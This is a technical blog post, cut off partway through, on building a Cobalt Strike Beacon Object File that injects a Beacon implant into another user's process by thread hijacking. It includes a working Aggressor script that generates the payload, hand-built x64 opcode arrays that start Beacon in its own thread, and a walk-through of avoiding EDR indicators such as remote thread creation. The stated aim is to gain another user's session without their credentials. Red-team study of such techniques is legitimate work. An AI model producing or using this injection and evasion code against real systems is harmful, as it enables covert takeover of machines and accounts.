Connor McGarr

Malware Development: Leveraging Beacon Object Files for Remote Process Injection via Thread Hijacking

9 January 2021 at 00:00

Introduction

As people I have interacted with will attest, my favorite subject in the entire world is binary exploitation. I love everything about it, from the problem solving aspects to the OS internals, assembly, and C side of the house. I also enjoy pushing my limits in order to find new and creative solutions for exploitation. In addition to my affinity for exploitation, I also love to red team. After all, this is what I do on a day to day basis. While I love to work my way around enterprise networks, I find myself really enjoying the host-based avoidance aspects of red teaming. I find it incredibly fun and challenging to use some of my prerequisite knowledge on exploitation and Windows internals in order to bypass security products and stay undetected (well, try to anyways). With Cobalt Strike, a very popular remote access tool (RAT), being so widely adopted by red teams - I thought I would investigate deeper into a newer Cobalt Strike capability, Beacon Object Files, which allow operators to write post-exploitation capabilities in C (which makes me incredibly happy as a person). This blog will go over a technique known as thread hijacking and integrating it into a usable Beacon Object File.

However, before beginning, I would like to note that this post will focus on the technique of remote process injection, thread hijacking, and thread restoration - not so much on Beacon Object Files themselves. Beacon Object Files, for our purposes, are a means to an end, as this technique can be deployed in many other fashions. As mentioned, Cobalt Strike is widely adopted; I think it is a great tool and I am a big proponent of it. At the end of the day, however, I still believe it is more important to understand the overarching concept behind a TTP (Tactic, Technique, and Procedure) than to learn how to simply run a tool, since relying on the tool itself creates a bottleneck in your red teaming methodology. If Cobalt Strike went away tomorrow, that shouldn’t render this TTP, or any other TTP, useless. Somewhat contradictorily, though, the first portion of this post will briefly outline what Beacon Object Files are, give a quick recap on remote process injection, and cover a bit on writing code that adheres to the needs of Beacon Object Files.

Lastly, the final project can be found here.

Beacon Object Files - You have two minutes, go.

Back in June, I saw a very interesting blog post from Cobalt Strike that outlined a new Beacon capability, known as Beacon Object Files. Beacon Object Files, stylized as BOFs, are essentially compiled C programs that are executed as position-independent code within Beacon. You bring the object file and Cobalt Strike supplies the linking. Raphael Mudge, the creator of Cobalt Strike, has a YouTube video that goes over the intrinsics, capabilities, and limitations of BOFs. I highly recommend you check out this video. In addition, I encourage you to check out TrustedSec’s BOF blog and project to supplement the available Cobalt Strike documentation for BOF development.

One thing to note before moving on is that BOFs are intended to be “lightweight” tools. Lightweight may be subjective, but as Raphael points out in his video and blog, the main benefits of BOFs are twofold:

  1. BOFs do not spawn a temporary “sacrificial” process to perform post-exploitation work - they’re directly executed as position-independent code within the current Beacon process, increasing overall OPSEC (operational security).
  2. BOFs are really meant to interact with the Windows API and the internal Beacon API, as BOFs expose a set of functions operators can use when developing. This means BOFs are smaller in size and easily allow you to invoke Windows APIs and interact with the internal Beacon API.

Additionally, there are a few drawbacks to BOFs:

  1. Cobalt Strike is the linker for BOFs - meaning libc style functions like strlen will not resolve. To compensate for this, however, you can use BOF compliant decorators in your function prototypes with the MSVCRT (Microsoft C Run-time) library and grab such functions from there. Declaring and using such functions with BOFs will be outlined in the latter portions of this post. Additionally, from Raphael’s CVE-2020-0796 BOF, there are ways to define your own C-style functions.
  2. BOFs are executed within the current Beacon process - meaning that if your BOF encounters some kind of internal error and fails, your Beacon process will crash as well. This means BOFs should be carefully vetted and tested across multiple systems, networks, and environments, while also implementing host-based checks for version information, using properly documented data types and structures outlined in a function’s prototype, and cleaning up any opened handles, allocated memory, etc.

Now that that’s out of the way, let’s get into a bit of background on remote process injection and thread hijacking, as well as outline our BOF’s execution flow.

Remote Process Injection

Remote process injection, for the unfamiliar, is a technique in which an operator can inject code into another process on a machine, under certain circumstances. This is most commonly done with a chain of Windows API calls that allocate some memory in the other process, write user-defined data (usually a shellcode of some sort) to that allocation, and kick off execution by creating a thread within the remote process. The APIs VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, respectively, are popular choices.

Why is remote process injection important? Take a look at the image below, which is a listing of processes performed inside of a Cobalt Strike Beacon implant.

As is seen above, Cobalt Strike not only discloses to the operator what processes are running, but also the user context each process is running under. This could be very useful on a penetration test in an Active Directory environment where the goal is to obtain domain administrative access. Let’s say you as an operator obtain access to a server where there are many users logged in, including a user with domain administrative access. This means that there is a great likelihood there will be processes running in context of this high-value user. This concept can be seen below, where a second process listing is performed and another user, ANOTHERUSER, has a PowerShell.exe process running on the host.

Using Cobalt Strike’s built-in inject capability, a raw Beacon implant can be injected into the PowerShell.exe process utilizing the remote injection technique outlined in the Cobalt Strike Malleable C2 profile, resulting in a second callback, in context of the ANOTHERUSER user, using the PID of the PowerShell.exe instance, process architecture (64-bit), and the name of the Cobalt Strike listener as arguments.

After the injection, there is a successful callback, resulting in a valid session in context of the ANOTHERUSER user.

This is useful to a red team operator, as the credentials for ANOTHERUSER were not needed in order to obtain access in context of said user. However, there are a few drawbacks - including endpoint detection and response (EDR) products that detect such behavior. One of the indicators of compromise (IOC) would be, in this instance, a remote thread being created in a remote process. There are more IOCs for this TTP, but this blog will focus on circumventing the need to create a remote thread. Instead, let’s examine thread hijacking, a technique in which an already existing thread within the target process is suspended and manipulated in order to execute shellcode.

Thread Hijacking and Thread Restoration

As mentioned earlier, the process for a typical remote injection is:

  1. Allocate a memory region within the target process using VirtualAllocEx. A handle to the target process must already be existing with an access right of at least PROCESS_VM_OPERATION in order to leverage this API successfully. This handle can be obtained using the Windows API function OpenProcess.
  2. Write your code to the allocated region using WriteProcessMemory. A handle to the target process must already exist with an access right of at least PROCESS_VM_WRITE and the previously mentioned PROCESS_VM_OPERATION - meaning a handle to the remote process must have both of these access rights at minimum to perform remote injection.
  3. Create a remote thread, within the remote process, to execute the shellcode, using CreateRemoteThread.

Our thread hijacking technique will utilize the first two members of the previous list, but instead of CreateRemoteThread, our workflow will consist of the following:

  1. Open a handle to the remote process using the aforementioned access rights required by VirtualAllocEx and WriteProcessMemory.
  2. Loop through the threads on the machine utilizing the Windows API CreateToolhelp32Snapshot. This loop will contain logic to break upon identifying the first thread within the target process.
  3. Upon breaking the loop, open a handle to the target thread using the Windows API function OpenThread.
  4. Call SuspendThread, passing the former thread handle mentioned as the argument. SuspendThread requires the handle has an access right of THREAD_SUSPEND_RESUME.
  5. Call GetThreadContext, using the thread handle. This function requires that handles have a THREAD_GET_CONTEXT access right. This function will dump the current state of the target thread’s CPU registers, processor flags, and other CPU information into a CONTEXT record. This is because each thread has its own stack, CPU registers, etc. This information will be later used to execute our shellcode and to restore the thread once execution has completed.
  6. Inject the shellcode into the desired process using VirtualAllocEx and WriteProcessMemory. The shellcode that will be used in this blog will be the default Cobalt Strike payload, which is a reflective DLL. This payload will be dynamically generated with a user-specified listener that exists already, using a Cobalt Strike Aggressor Script. Creation of the Aggressor Script will follow in the latter portions of this blog post. The Beacon implant won’t be executed quite yet, it will just be sitting within the target remote process, for the time being.
  7. Since Cobalt Strike’s default stageless payload is a reflective DLL, it works a bit differently than traditional shellcode. Because it is a reflective DLL, when the DllMain function is called to kick off Beacon, the shellcode never performs a “return”, because Beacon calls either ExitThread or ExitProcess to leave DllMain, depending on what is specified in the payload by the operator. Because of this, it would not be possible to restore the hijacked thread, as the thread would run the DllMain function until the operator exits the Beacon. Due to this, we must create a shellcode that our Beacon implant will be wrapped in, with a custom CreateThread routine that creates a local thread within the remote process for the Beacon implant to run. Essentially, this is one of three components our “new” full payload will “carry”, so when execution reaches the remote process, the call to CreateThread, which creates a local thread, will allocate the thread in the remote process for Beacon to run in. This means that the hijacked thread will never actually execute the Beacon implant. Instead, it will execute a small shellcode, made up of three components: the routine that places the Beacon implant into its own local thread, along with two other routines that will be described shortly. Up until this point, no code has been executed and everything mentioned is just a synopsis of each component’s purpose.
  8. The custom CreateThread routine is actually executed by being called from another routine that will be wrapped into our final payload, which is a routine for a call to NtContinue. This is the second component of our custom shellcode. After the CreateThread routine is finished executing, it will perform a return back into the NtContinue routine. After the hijacked thread executes the CreateThread routine, the thread needs to be restored with the original CPU registers, flags, etc. it had before the thread hijack occurred. NtContinue will be talked about in the latter portions of this post, but for now just know that NtContinue, at a high level, is a function in ntdll.dll that accepts a pointer to a CONTEXT record and sets the calling thread to that context. Again, no code has been executed so far. The only thing that has changed is our large “final payload” has added another component to it, NtContinue.
  9. The CreateThread routine is first prepended with a stack alignment routine, which performs bitwise AND with the stack pointer, to ensure a 16-byte alignment. Some function calls fail if they are not 16-byte aligned, and this ensures when the shellcode performs a call to the CreateThread routine, it is first 16-byte aligned. malloc is then invoked to create one giant buffer that all of these “moving parts” are added to.
  10. Now that there is one contiguous buffer for the final payload, using VirtualAllocEx and WriteProcessMemory, again, the final payload, consisting of the three routines, is injected into the remote process.
  11. Lastly, the previously captured CONTEXT record is updated so that its Rip member, a DWORD64 that holds the value of the 64-bit instruction pointer, points to the address of our full payload.
  12. SetThreadContext is then called, which forces the target thread to be updated to point to the final payload, and ResumeThread is used to queue our shellcode execution, by resuming the hijacked thread.
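The alignment mentioned in step 9 comes down to plain mask arithmetic: clearing the low four bits of the stack pointer rounds it down to a multiple of 16. Below is a minimal sketch in portable C that works on an ordinary integer rather than the real RSP. The helper name align_down_16 is made up for illustration, and the exact instruction used by the stack alignment routine is not shown in this part of the post, so treat this as the arithmetic only.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper (not from the project): round a stack-pointer value
   down to a 16-byte boundary by clearing its low four bits. */
static uint64_t align_down_16(uint64_t sp)
{
    uint64_t aligned = sp & ~(uint64_t)0xF;   /* bitwise AND with ...FFF0 */

    assert((aligned & 0xF) == 0);             /* result is 16-byte aligned */
    assert(aligned <= sp);                    /* the value never moves up  */
    return aligned;
}
```

For example, align_down_16(0x7ffd1238) yields 0x7ffd1230, while a value that is already aligned, such as 0x7ffd1230, comes back unchanged.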

Before moving on, there are two things I would like to call out. The first is the call to CreateThread. At first glance, this may not seem like a meaningful improvement over calling CreateRemoteThread directly. The benefit of the thread hijacking technique is that even though a thread is created, it is not created from a remote process, it is created locally. This does two things: it avoids the common API call chain of VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, and it blends in (a bit more) by calling CreateThread, which is a less scrutinized API call. The second is that there are other IOCs that can be used to detect this technique. However, I will leave that as an exercise to the reader :-).

Let’s move on and start with some code.

Visual Studio + Beacon Object File Intrinsics

For this project, I will be using Visual Studio and the MSVC Compiler, cl.exe. Feel free to use mingw, as it can also produce BOFs. Let’s go over a few house rules for BOFs before we begin.

In order to compile a BOF on Visual Studio, open an x64 Native Tools Command Prompt for VS session and use the following command: cl /c /GS- INPUT.c /FoOUTPUT.o. This will compile the C program as an object file only and will not implement stack cookies, due to the Cobalt Strike linker obviously not being able to locate the injected stack cookie check functions.

If you would like to call a Windows API function, BOFs require a __declspec(dllimport) keyword, which is defined in winnt.h as DECLSPEC_IMPORT. This indicates to the compiler that this function is found within a DLL, telling the compiler essentially “this function will be resolved later” and as mentioned before, since Cobalt Strike is the linker, this is needed to tell the compiler to let the linking come later. Since the linking will come later, this also means a full function prototype must be supplied to the BOF. You can use Visual Studio to “peek” the prototype of a Windows API function. Reusing that prototype is enough to attribute the __declspec(dllimport) keyword to our own function prototypes, as the prototypes of most Windows API functions are annotated with a macro such as WINBASEAPI, or similar, which is a #define that already expands to __declspec(dllimport). An example would be the prototype of the function GetProcAddress, as seen below.

This reveals the __declspec(dllimport) keyword will be present when this BOF is compiled.

Armed with this information, if an operator wanted to include the function GetProcAddress in their BOF, it would be outlined as such:

WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);

The value directly before the $ represents the library the function is found in. The relocation table of the object file, which essentially contains pointers to the list of items the object file needs addresses for, like functions in other libraries or object files, will point to the prototyped LIB$Function function’s memory address. Cobalt Strike, acting as the linker and loader, will parse this table and update the relocation table of the object file, where applicable, with the actual addresses of the user-defined Windows API functions, such as GetProcAddress in the above test case. This blob is then passed to Beacon as code to be executed. Not reinventing the wheel here, Raphael outlines this all in his wonderful video.
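To make the LIB$Function naming convention concrete, here is a small sketch in portable C that splits such a symbol name at the $ into its library and function halves. It only illustrates the convention and is not how Cobalt Strike implements its linker. The helper name split_bof_symbol is hypothetical, and skipping an optional __imp_ prefix (which compilers commonly add to dllimport symbols) is an assumption on my part.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: split "LIB$Function" into its two halves.
   Assumption: an optional "__imp_" prefix is skipped if present.
   Returns 0 on success, -1 if the name is malformed or a buffer is too small. */
static int split_bof_symbol(const char *sym,
                            char *lib, size_t lib_cap,
                            char *func, size_t func_cap)
{
    static const char prefix[] = "__imp_";
    const char *dollar;
    size_t lib_len, func_len;

    assert(sym != NULL && lib != NULL && func != NULL);

    if (strncmp(sym, prefix, sizeof(prefix) - 1) == 0)
        sym += sizeof(prefix) - 1;

    dollar = strchr(sym, '$');
    if (dollar == NULL)
        return -1;                            /* not in LIB$Function form */

    lib_len = (size_t)(dollar - sym);
    func_len = strlen(dollar + 1);
    if (lib_len == 0 || func_len == 0 ||
        lib_len >= lib_cap || func_len >= func_cap)
        return -1;                            /* empty half or buffer too small */

    memcpy(lib, sym, lib_len);
    lib[lib_len] = '\0';
    memcpy(func, dollar + 1, func_len + 1);   /* copies the terminator too */
    return 0;
}
```

Given "KERNEL32$GetProcAddress", the helper fills lib with "KERNEL32" and func with "GetProcAddress", which is the pair of names a loader would need in order to look the function up.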

In addition to this, I will hit on one last thing - and that is user-supplied arguments and returning output back to the operator. Beacon exposes an internal API to BOFs, which is outlined in the beacon.h header file supplied by Cobalt Strike. For returning output back to the operator, the API BeaconPrintf is exposed, and can return output over Beacon. This API accepts an output type, given as one of the #define directives in beacon.h, namely CALLBACK_OUTPUT and CALLBACK_ERROR, followed by a user-supplied string. For instance, updating the operator with a message would be implemented as such:

BeaconPrintf(CALLBACK_OUTPUT, "[+] Hello World!\n");

For accepting user supplied arguments, you’ll need to implement an Aggressor Script into your project. The following will be the script used for this post.

# Setup cThreadHijack
alias cThreadHijack {

    # Alias for Beacon ID and args
    local('$bid $listener $pid $payload');
    
    # Unpack the Beacon ID and the user-supplied arguments
    ($bid, $pid, $listener) = @_;

    # Verify the number of arguments
    if (size(@_) != 3)
    {
        berror($bid, "Error! Please enter a valid listener and PID");
        return;
    }

    # Read in the BOF
    $handle = openf(script_resource("cThreadHijack.o"));
    $data = readb($handle, -1);
    closef($handle);

    # Verify PID is an integer
    if ((!-isnumber $pid) || (int($pid) <= 0))
    {
        berror($bid, "Please enter a valid PID!\n");
        return;
    }

    # Generate a new payload and save a copy of it to out.bin
    $payload = payload_local($bid, $listener, "x64", "thread");
    $handle1 = openf(">out.bin");
    writeb($handle1, $payload);
    closef($handle1);
    
    # Pack the arguments
    # 'b' is binary data and 'i' is an integer
    $args = bof_pack($bid, "ib", $pid, $payload);

    # Run the BOF
    # go = Entry point of the BOF
    beacon_inline_execute($bid, $data, "go", $args);
}

The goal is to be able to supply our BOF, with the very original name cThreadHijack, to Cobalt Strike along with a PID for injection and the name of a Cobalt Strike listener. The first local statement sets up our variables, which include the ID of the Beacon executing the BOF, the listener name, the PID, and the payload, which will be generated later. The @_ array holds the arguments in the order they are supplied, meaning the command to use this BOF would be cThreadHijack PID "Name of listener". After, error checking is done to determine if 3 arguments have been supplied: the Beacon ID, which Cobalt Strike passes to the alias without us needing to input anything, plus the PID and the listener name. After the object file is read in and the PID is verified, the Aggressor function payload_local is used to generate a raw Cobalt Strike payload with the user-supplied listener name and an exit method. After this, the user-supplied argument $pid is packed as an integer and the newly created $payload variable is packed as a binary value. Then, when the alias cThreadHijack is run in Cobalt Strike, the BOF is executed with the aforementioned arguments, using the function go as the main entry point. This script must be loaded before executing the BOF.

From the C code side, this is how it looks to set these arguments and define the functions needed for thread hijacking.

The function BeaconDataParse is first used, with a special datap structure, to obtain the user-supplied arguments. Then, the value int pid is set to the user-supplied PID, while the char* shellcode value is set to the Beacon implant, meaning everything is in place. Finally, now that the details on adhering to BOF rules while writing C are out of the way, let’s get into the code.

Open, Enumerate, Suspend, Get, Inject, and Get Out!

The first step in thread hijacking is to first open a handle to the target process. As mentioned before, calls that utilize this handle, VirtualAllocEx and WriteProcessMemory, must have a total access right of PROCESS_VM_OPERATION and PROCESS_VM_WRITE. This can be correlated to the following code.

This function accepts the user-supplied argument for a PID and returns a handle to it. After the process handle is opened, the BOF starts enumerating threads using the API CreateToolhelp32Snapshot. This routine is sent through a loop and “breaks” upon the first thread of the target PID being reached. When this happens, a call to OpenThread with the rights THREAD_SUSPEND_RESUME, THREAD_SET_CONTEXT, and THREAD_GET_CONTEXT occurs. This allows the program to suspend the thread, obtain the thread’s context, and set the thread’s context.

At this point, the goal is to suspend the identified thread, in order to obtain its current CONTEXT record and later set its context again.

Once the thread has been suspended, the Beacon implant is remotely injected into the target process. This will not be the final payload the hijacked thread will execute, this is simply to inject the Beacon implant into the remote process in order to use this address later on in the CreateThread routine.

Now that the remote thread is suspended and our Beacon implant shellcode is sitting within the remote process address space, it is time to implement a BYTE array that places the Beacon implant in a thread and executes it.

Beacon - Stay Put!

As previously mentioned, the first goal will be to place the already injected Beacon implant into its own thread. Currently, the implant is just sitting within the desired remote process and has not executed. To do this, we will create a 64-byte BYTE array that will contain the necessary opcodes to perform this task. Let’s take a look at the CreateThread function prototype.

HANDLE CreateThread(
  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  SIZE_T                  dwStackSize,
  LPTHREAD_START_ROUTINE  lpStartAddress,
  __drv_aliasesMem LPVOID lpParameter,
  DWORD                   dwCreationFlags,
  LPDWORD                 lpThreadId
);

As mentioned by Microsoft documentation, this function will create a thread to execute within the virtual address space of the calling process. Since we will be injecting this routine into the remote process, when the routine is executed, it will create a thread within the remote process. This is beneficial to us, as CreateThread creates a local thread - but since the routine will be executed inside of the remote process, it will spawn a local thread there, instead of requiring us to create a thread, remotely, from our current process.

The function argument we will be worried about is lpStartAddress, of type LPTHREAD_START_ROUTINE, which is really just a function pointer to whatever the thread will execute. In our case, this will be the address of our previously injected Beacon implant. We already have this address, as VirtualAllocEx has a return value of type LPVOID, which is a pointer to our shellcode. Let’s get into the development of the routine.

The first step is to declare a BYTE array of 64 bytes. 64 bytes was chosen, as it is a multiple of the size of a QWORD (8 bytes), which is the size of a 64-bit address. This is to ensure proper alignment, meaning 8 QWORDs will be used for this routine - which keeps everything nice and aligned. Additionally, we will declare an integer variable to use as a “counter” in order to make sure we are placing our opcodes at the correct index within the BYTE array.

BYTE createThread[64] = { 0 };
int z = 0;

Since we are working on a 64-bit system, we must adhere to the __fastcall calling convention. This calling convention requires the first four integer arguments (floating-point values are passed in different registers) are passed in the RCX, RDX, R8, and R9 registers, respectively. However, the question remains - CreateThread has a total of six parameters, what do we do with the last two? With __fastcall, the fifth and subsequent parameters are located on the stack at an offset of 0x20 and every 0x8 bytes subsequently. This means, for our purposes, the fifth parameter will be located at RSP + 0x20 and the sixth will be located at RSP + 0x28. Here are the parameters used for our purposes.

  1. lpThreadAttributes will be set to NULL. Setting this value to NULL will ensure the thread handle isn’t inherited by child processes.
  2. dwStackSize will be set to 0. Setting this parameter to 0 forces the thread to inherit the default stack size for the executable, which is fine for our purposes.
  3. lpStartAddress, as previously mentioned, will be the address of our shellcode. This parameter is a function pointer to be executed by the thread.
  4. lpParameter will be set to NULL, as our thread does not need to inherit any variables.
  5. dwCreationFlags will be set to 0, which indicates we would like the thread to run immediately after it is created. This will kick off our Beacon implant, after thread creation.
  6. lpThreadId will be set to NULL, which is of less importance to us - as this will not return a thread ID to the LPDWORD pointer parameter. Essentially, we could have passed a legitimate pointer to a DWORD and it would have been dynamically filled with the thread ID. However, this is not important for the purposes of this post.
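As a quick way to check the register and stack slots described above, the following sketch in portable C maps an argument's position to where the caller places it. The helper name x64_arg_location is hypothetical, it only covers integer and pointer arguments, and the offsets are relative to RSP at the moment just before the call instruction executes (the first 0x20 bytes are the shadow space reserved for the four register arguments).

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: for the n-th (1-based) integer or pointer argument,
   return the register name for arguments 1 through 4, or NULL for a stack
   argument, in which case *rsp_offset receives its offset from RSP as seen
   by the caller just before the call instruction. */
static const char *x64_arg_location(unsigned n, unsigned *rsp_offset)
{
    static const char *regs[4] = { "rcx", "rdx", "r8", "r9" };

    assert(n >= 1 && rsp_offset != NULL);
    if (n <= 4) {
        *rsp_offset = 0;                  /* not on the stack */
        return regs[n - 1];
    }
    /* 0x20 bytes of shadow space, then one 8-byte slot per argument */
    *rsp_offset = 0x20 + (n - 5) * 8;
    return NULL;
}
```

For CreateThread this gives rcx, rdx, r8, and r9 for the first four parameters, then offsets 0x20 and 0x28 for dwCreationFlags and lpThreadId, matching the slots used in this routine.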

The first step is to place a value of NULL, or 0, into the RCX register, for the lpThreadAttributes argument. To do this, we can use bitwise XOR.

// xor rcx, rcx
createThread[z++] = 0x48;
createThread[z++] = 0x31;
createThread[z++] = 0xc9;

This performs bitwise XOR with the same two values (RCX), which results in 0, as bitwise XOR of a value with itself is always 0. The result is then placed in the RCX register. Similarly, we can leverage the same property of XOR for the second parameter, dwStackSize, which is also 0.

// xor rdx, rdx
createThread[z++] = 0x48;
createThread[z++] = 0x31;
createThread[z++] = 0xd2;

The next step covers the only parameter we really need to supply a specific value for, which is lpStartAddress. Before supplying this parameter, let’s take a quick look back at our first injection, which planted the Beacon implant into the desired remote process.

The above code returns the virtual memory address of our allocation into the variable placeRemotely. As can be seen, this return value is of the data type LPVOID, while the lpStartAddress argument takes a data type of LPTHREAD_START_ROUTINE, which is pretty similar to LPVOID. However, for continuity’s sake, we will first type cast this allocation into an LPTHREAD_START_ROUTINE function pointer.

// Casting shellcode address to LPTHREAD_START_ROUTINE function pointer
LPTHREAD_START_ROUTINE threadCast = (LPTHREAD_START_ROUTINE)placeRemotely;

In order to place this value into the BYTE array, we will need to use a function that can copy this address to the buffer, as the BYTE array will only accept one byte at a time. There is a limitation however, as BOFs do not link C-Runtime functions such as memcpy. We can overcome this by creating our own custom memcpy routine, or grabbing one from the MSVCRT library, which Cobalt Strike can link for us. However, for now and for awareness of others, we will leverage a libc.h header file that Raphael created, which can be found here.

Using the custom mycopy function, we can now perform a mov r8, LPTHREAD_START_ROUTINE instruction.

// mov r8, LPTHREAD_START_ROUTINE
createThread[z++] = 0x49;
createThread[z++] = 0xb8;
mycopy(createThread + z, &threadCast, sizeof(threadCast));
z += sizeof(threadCast);

Notice how the end of this small shellcode blob contains an update for the array index counter z, to ensure the array is written to at the correct index. We have the luxury of using a mov r8, LPTHREAD_START_ROUTINE, as our shellcode pointer has already been mapped into the remote process. This will allow the CreateThread routine to find this function pointer, in memory, as it is available within the remote process address space. We must remember that each process on Windows has its own private virtual address space, meaning memory in one user mode process isn’t visible to another user mode process. As we will see with the NtContinue stub coming up, we will actually have to embed the preserved CONTEXT record of the hijacked thread into the payload itself, as the structure is located in the current process, while the code will be executing within the desired remote process.
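To show what those ten bytes look like once the address has been copied in, here is a minimal sketch in portable C that writes the same two opcode bytes followed by a 64-bit immediate in little-endian order, which is the byte order mycopy produces on x64. The helper name emit_mov_r8_imm64 and the address used in the example are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: write `mov r8, imm64` (49 B8 followed by the 8-byte
   immediate, least significant byte first) into buf starting at index z.
   Returns the index just past the instruction. */
static size_t emit_mov_r8_imm64(uint8_t *buf, size_t cap, size_t z, uint64_t imm)
{
    int i;

    assert(buf != NULL && z + 10 <= cap);     /* 2 opcode + 8 immediate bytes */
    buf[z++] = 0x49;                          /* REX prefix: 64-bit operand, extended register */
    buf[z++] = 0xb8;                          /* mov r64, imm64, register encoded in the low bits */
    for (i = 0; i < 8; i++)
        buf[z++] = (uint8_t)(imm >> (8 * i)); /* little-endian immediate */
    return z;
}
```

With a made-up address of 0x000001A2B3C4D5E6, the buffer ends up holding 49 b8 e6 d5 c4 b3 a2 01 00 00 and the returned index is 10, which is why the counter z has to advance by sizeof(threadCast) after the copy.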

Now that the lpStartAddress parameter has been completed, lpParameter must be set to NULL. Again, this can be done by utilizing bitwise XOR.

// xor r9, r9
createThread[z++] = 0x4d;
createThread[z++] = 0x31;
createThread[z++] = 0xc9;

The last two parameters, dwCreationFlags and lpThreadId, will be located at an offset of 0x20 and 0x28, respectively, from RSP. Since R9 already contains a value of 0, and since both parameters need a value of 0, we can use two mov instructions, as such.

// mov [rsp+20h], r9 (which already contains 0)
createThread[z++] = 0x4c;
createThread[z++] = 0x89;
createThread[z++] = 0x4c;
createThread[z++] = 0x24;
createThread[z++] = 0x20;

// mov [rsp+28h], r9 (which already contains 0)
createThread[z++] = 0x4c;
createThread[z++] = 0x89;
createThread[z++] = 0x4c;
createThread[z++] = 0x24;
createThread[z++] = 0x28;

A quick note - notice that the brackets surrounding each [rsp+OFFSET] operand indicate we would like to overwrite what that value is pointing to.
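For readers curious why those five bytes mean "store R9 at [rsp+OFFSET]", the sketch below splits a ModRM or SIB byte into its 2-bit, 3-bit, and 3-bit fields. The struct and helper names are hypothetical and the code is portable C, meant only as a decoding aid and not as part of the BOF.

```c
#include <assert.h>
#include <stdint.h>

/* The three bit fields shared by ModRM and SIB bytes (2 + 3 + 3 bits). */
struct bitfields233 {
    unsigned top;   /* ModRM.mod or SIB.scale */
    unsigned mid;   /* ModRM.reg or SIB.index */
    unsigned low;   /* ModRM.rm  or SIB.base  */
};

/* Hypothetical helper: split a ModRM or SIB byte into its fields. */
static struct bitfields233 split_233(uint8_t b)
{
    struct bitfields233 f;

    f.top = (b >> 6) & 0x3;
    f.mid = (b >> 3) & 0x7;
    f.low = b & 0x7;
    assert(((f.top << 6) | (f.mid << 3) | f.low) == b);   /* fields recombine to b */
    return f;
}
```

Applied to the bytes above: the first 0x4c is the REX prefix, and 0x89 is the opcode for a register-to-memory mov. The second 0x4c is the ModRM byte, which splits into mod=1 (an 8-bit displacement follows), reg=1 (extended by the REX prefix to register 9, R9), and rm=4 (a SIB byte follows). The SIB byte 0x24 splits into scale=0, index=4 (no index register), and base=4 (RSP). The final byte, 0x20 or 0x28, is the displacement.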

The next goal is to resolve the address of CreateThread. Even though we will be resolving this address within the BOF, meaning it will be resolved within the current process, not the desired remote process, the address of CreateThread will be the same across processes, although each user mode process is mapped its own view of kernel32.dll. To resolve this address, we will use the following routine, with BOF denotations in our code.

// Resolve the address of CreateThread (FARPROC is cast to a 64-bit integer so it can be copied with mycopy)
unsigned long long createthreadAddress = (unsigned long long)KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("kernel32"), "CreateThread");

// Error handling
if (createthreadAddress == 0)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to resolve CreateThread. Error: 0x%lx\n", KERNEL32$GetLastError());
}

The unsigned long long variable createthreadAddress will be filled with the address of CreateThread. unsigned long long is a 64-bit value, which is the size of a memory address on a 64-bit system. Although KERNEL32$GetProcAddress has a prototype with a return value of FARPROC, we need the address to actually be of the type unsigned long long, DWORD64, or similar, to allow us to properly copy this address into the routine with mycopy. The next goal is to move the address of CreateThread into RAX. After this, we will perform a call rax instruction, which will kick off the routine. This can be seen below.

// mov rax, CreateThread
createThread[z++] = 0x48;
createThread[z++] = 0xb8;
mycopy(createThread + z, &createthreadAddress, sizeof(createthreadAddress));
z += sizeof(createthreadAddress);

// call rax (call CreateThread)
createThread[z++] = 0xff;
createThread[z++] = 0xd0;

Additionally, we want to add a ret opcode. The way our full payload will be setup is as follows:

  1. A call to the stack alignment/CreateThread routine will be made first (the stack alignment routine is covered in a later portion of this blog). When a call instruction is executed, it pushes a return address onto the stack. This is the address that ret will jump to in order to continue execution of the payload. When the stack alignment/CreateThread routine is called, the return address pushed onto the stack will be the address of the next instruction inside of the NtContinue routine.
  2. We want to end our stack alignment/CreateThread routine with a ret instruction. This ret will force execution back to the NtContinue routine. This will all be outlined when execution is examined inside of WinDbg.
  3. The call to the stack alignment/CreateThread routine is actually going to be a part of the NtContinue routine. The first instruction in the NtContinue routine will be a call to the stack alignment/CreateThread shellcode, which will then perform a ret back to the NtContinue routine, where thread execution will be restored. Here is a quick visual.

PAYLOAD = NtContinue shellcode calls stack alignment/CreateThread shellcode -> stack alignment/CreateThread shellcode executes, placing Beacon in its own local thread. This shellcode performs a return back to the NtContinue shellcode -> NtContinue shellcode finishes executing, which restores the thread

In accordance with our plan, let’s end the CreateThread routine with a 0xc3 opcode, which is a return instruction.

// Return to the caller in order to kick off NtContinue routine
createThread[z++] = 0xc3;

Let’s continue by developing an NtContinue shellcode routine. After that, we will develop a stack alignment shellcode in order to ensure the stack pointer is 16-byte aligned when the first call occurs in our final payload. Once we have completed both of these routines, we will walk through the entire shellcode inside of the debugger.

“Never in the Field of Human Conflict, Was So Much Owed, by So Many, to NtContinue”

Up until now, we have achieved the following:

  1. Our shellcode has been injected into the remote process.
  2. We have identified a remote thread, which we will later manipulate to execute our Beacon implant
  3. We have created a routine that will place the Beacon implant in its own local thread, within the remote process, upon execution

This is great, and we are almost home free. The issue that remains, however, is thread restoration. After all, we are taking a thread, which was performing some sort of action before, unbeknownst to us, and forcing it to do something else. This will certainly result in execution of our shellcode; however, it will also have some unintended consequences. Upon executing our shellcode, the thread’s CPU registers, along with other information, will be out of context from the actions it was performing before execution. This will most likely cause the process housing this thread, the desired remote process we are injecting into, to crash. To avoid this, we can utilize an undocumented ntdll.dll function, NtContinue. As pointed out in Alex Ionescu and Yarden Shafir’s R.I.P ROP: CET Internals in Windows 20H1 blog post, NtContinue is used to resume execution after an exception or interrupt. This is perfect for our use case, as we can abuse this functionality. Since our thread will be mangled, calling this function with the preserved CONTEXT record from earlier will restore execution properly. NtContinue accepts a pointer to a CONTEXT record, and a parameter that allows a programmer to set if the Alerted state should be removed from the thread, as outlined in its function prototype. We need not worry about the second parameter for our purposes, as we will set this parameter to FALSE. However, there remains the issue of the first parameter, PCONTEXT.

